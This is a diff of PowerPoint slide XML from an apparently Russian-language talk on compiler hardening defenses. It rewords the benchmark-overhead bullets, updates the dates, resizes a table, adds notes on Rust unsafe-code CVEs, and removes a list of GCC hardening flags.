-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1112,7 +1112,7 @@
           <a:p>
             <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1310,7 +1310,7 @@
           <a:p>
             <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1585,7 +1585,7 @@
           <a:p>
             <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1850,7 +1850,7 @@
           <a:p>
             <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2262,7 +2262,7 @@
           <a:p>
             <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2403,7 +2403,7 @@
           <a:p>
             <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2516,7 +2516,7 @@
           <a:p>
             <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2827,7 +2827,7 @@
           <a:p>
             <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3115,7 +3115,7 @@
           <a:p>
             <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3356,7 +3356,7 @@
           <a:p>
             <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5226,15 +5226,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не удалось обнаружить замедления при компиляция </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> компилятором </a:t>
+              <a:t>Не удалось обнаружить замедления на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -7208,15 +7200,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>2% при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором Clang</a:t>
+              <a:t>2% на бенчмарке Clang</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -7859,15 +7843,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -8462,7 +8438,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостатки</a:t>
+              <a:t>Накладные расходы</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8503,8 +8479,13 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Нет замедления при компиляции CGBuiltin.cpp компилятором Clang </a:t>
-            </a:r>
+              <a:t>Нет замедления на бенчмарке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -10703,15 +10684,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет изменений при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>нет изменений на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -10726,15 +10699,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -11261,15 +11226,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Нет накладных расходов при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>Нет накладных на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -12684,15 +12641,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>3.5% при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором Clang </a:t>
+              <a:t>3.5% на бенчмарке Clang </a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -14613,15 +14562,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -17693,15 +17634,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -19515,15 +19448,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>замедление при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>замедление на бенчмарке </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -21372,15 +21297,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>4.5% оверхед при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором Clang</a:t>
+              <a:t>4.5% замедление на бенчмарке Clang</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -23824,15 +23741,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Компиляция </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором </a:t>
+              <a:t>Бенчмарк </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -23840,15 +23749,23 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет изменений при </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> 6% </a:t>
+              <a:t>нет </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU"/>
+              <a:t>изменений на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Intel </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CET,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> 6% оверхед на </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -30657,14 +30574,14 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1115383481"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1083554480"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
         </p:nvGraphicFramePr>
         <p:xfrm>
-          <a:off x="961464" y="1018091"/>
-          <a:ext cx="10051677" cy="5578290"/>
+          <a:off x="497541" y="960755"/>
+          <a:ext cx="8819032" cy="5760720"/>
         </p:xfrm>
         <a:graphic>
           <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
@@ -30673,28 +30590,28 @@
                 <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
               </a:tblPr>
               <a:tblGrid>
-                <a:gridCol w="2096238">
+                <a:gridCol w="2131360">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4226136556"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="3408139">
+                <a:gridCol w="2958353">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1905133483"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="2586450">
+                <a:gridCol w="1772770">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4013930117"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="1960850">
+                <a:gridCol w="1956549">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="697534993"/>
@@ -30702,7 +30619,7 @@
                   </a:extLst>
                 </a:gridCol>
               </a:tblGrid>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -30772,7 +30689,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -30864,7 +30781,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -30955,7 +30872,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31050,7 +30967,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31145,7 +31062,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31212,7 +31129,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="636000">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31309,7 +31226,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="908571">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31404,7 +31321,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31495,7 +31412,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31560,7 +31477,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="908571">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31629,7 +31546,7 @@
                   </a:ext>
                 </a:extLst>
               </a:tr>
-              <a:tr h="406450">
+              <a:tr h="363429">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -31757,6 +31674,99 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9773C-819E-4C51-B618-F92293F16CFF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9646024" y="1416424"/>
+            <a:ext cx="2312894" cy="2554545"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:prstClr val="black"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Все Rust CVE, связанные с ошибками памяти, вызваны ошибками в unsafe code</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:prstClr val="black"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:prstClr val="black"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId10"/>
+              </a:rPr>
+              <a:t>Xu et al., 2021</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:prstClr val="black"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1600" dirty="0"/>
+              <a:t>50% популярных крейтов содержат unsafe-код</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:hlinkClick r:id="rId11"/>
+              </a:rPr>
+              <a:t>Evans et al., 2020</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -31986,29 +31996,13 @@
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>OpenSSF</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Конкретный набор зависит от версии компилятора </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>есть </a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>см. </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -32020,201 +32014,64 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сейчас</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrivial</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-auto-var-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=zero -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fPIE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection=full</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Hardening-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>защиты в критическом ПО</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Чаты, почтовые клиенты, мультимедиа, интерпретаторы, БД, офисное ПО</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ридеры</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
             </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux OS (Android, Windows, macOS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защиты в критическом ПО</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Чаты, почтовые клиенты, мультимедиа, интерпретаторы, БД, офисное ПО</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ридеры</a:t>
+            </a:r>
